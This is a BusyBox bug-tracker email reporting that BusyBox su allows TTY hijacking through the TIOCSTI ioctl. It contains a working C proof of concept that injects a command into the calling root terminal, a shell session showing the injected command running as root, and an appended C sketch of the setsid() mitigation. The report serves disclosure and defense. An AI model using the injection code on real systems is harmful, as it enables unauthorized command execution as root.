[Bug 9401] New: privilege escalation with TIOCSTI ioctl from busybox su

bugzilla at busybox.net bugzilla at busybox.net
Wed Nov 2 01:18:30 UTC 2016


https://bugs.busybox.net/show_bug.cgi?id=9401

            Bug ID: 9401
           Summary: privilege escalation with TIOCSTI ioctl from busybox
                    su
           Product: Busybox
           Version: unspecified
          Hardware: All
                OS: Linux
            Status: NEW
          Severity: normal
          Priority: P5
         Component: Other
          Assignee: unassigned at busybox.net
          Reporter: _ at lizzie.io
                CC: busybox-cvs at busybox.net
  Target Milestone: ---

Created attachment 6796
  --> https://bugs.busybox.net/attachment.cgi?id=6796&action=edit
use the TIOCSTI ioctl to write a command to the controlling tty

I noticed that Busybox su is vulnerable to tty hijacking with the
TIOCSTI ioctl. For example, this C program writes to the controlling
terminal and so can run arbitrary shell commands. With this, any
unprivileged program run with su can execute code as the calling user.

        #include <unistd.h>
        #include <sys/ioctl.h>
        #include <stdio.h>

        int main()
        {
             for (char *cmd = "id\n"; *cmd; cmd++) {
                     if (ioctl(STDIN_FILENO, TIOCSTI, cmd)) {
                             fprintf(stderr, "++ ioctl failed: %m\n");
                             return 1;
                     }
             }
             return 0;
        }


        [lizzie at empress misc]$ gcc -Wall -Werror tiocsti.c -o tiocsti
        [lizzie at empress misc]$ sudo bash
        [root at empress misc]# ./busybox su -v
        su: invalid option -- 'v'
        BusyBox v1.26.0.git (2016-10-25 17:15:49 PDT) multi-call binary.

        Usage: su [OPTIONS] [-] [USER]

        Run shell under USER (by default, root)

                -,-l    Clear environment, run shell as login shell
                -p,-m   Do not set new $HOME, $SHELL, $USER, $LOGNAME
                -c CMD  Command to pass to 'sh -c'
                -s SH   Shell to use instead of user's default
        [root at empress misc]# ./busybox su lizzie -c ./tiocsti
        id
        [root at empress misc]# id
        uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
        [root at empress misc]# ./busybox --version

Note that this was done without any user interaction beyond './busybox
su lizzie -c ./tiocsti'. Also worth noting that util-linux su prevents
this. (CVE-2005-4890 was a similar issue from 2005 in util-linux su).

        [root at empress misc]# su --version
        su from util-linux 2.28.2
        [root at empress misc]# su lizzie  -c tiocsti
        bash: tiocsti: command not found
        [root at empress misc]# su lizzie -c ./tiocsti
        ++ ioctl failed: Operation not permitted

-- 
You are receiving this mail because:
You are on the CC list for the bug.
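
Added example, not part of the original report or of BusyBox: a C sketch of the mitigation behind the "Operation not permitted" result above, in which the command is started in a new session via setsid() so it has no controlling terminal (util-linux su does this for -c). The names run_detached and detached_child_has_no_ctty are hypothetical, and the privilege drop a real su performs is omitted.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return pid's exit status, or -1 if it did not exit normally. */
static int wait_exit(pid_t pid)
{
    int st;
    while (waitpid(pid, &st, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Run argv in a new session. The child keeps the inherited tty
 * descriptors but has no controlling terminal, so TIOCSTI on them
 * fails with EPERM unless the caller holds CAP_SYS_ADMIN. A real su
 * would also drop privileges before execvp(); omitted here. */
int run_detached(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setsid() < 0)      /* a fresh child is never a group leader */
            _exit(126);
        execvp(argv[0], argv);
        _exit(127);            /* exec failed */
    }
    return wait_exit(pid);
}

/* Self-check: 1 if a child that called setsid() leads its own session
 * and cannot open /dev/tty (no controlling terminal), otherwise 0. */
int detached_child_has_no_ctty(void)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setsid() < 0 || getsid(0) != getpid())
            _exit(0);
        _exit(open("/dev/tty", O_RDWR | O_NOCTTY) < 0 ? 1 : 0);
    }
    return wait_exit(pid);
}

int main(int argc, char **argv)
{
    return argc > 1 ? run_detached(argv + 1) : detached_child_has_no_ctty() != 1;
}
```

The cost of this approach is that the detached command loses job control and terminal-generated signals such as Ctrl-C from the invoking terminal.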

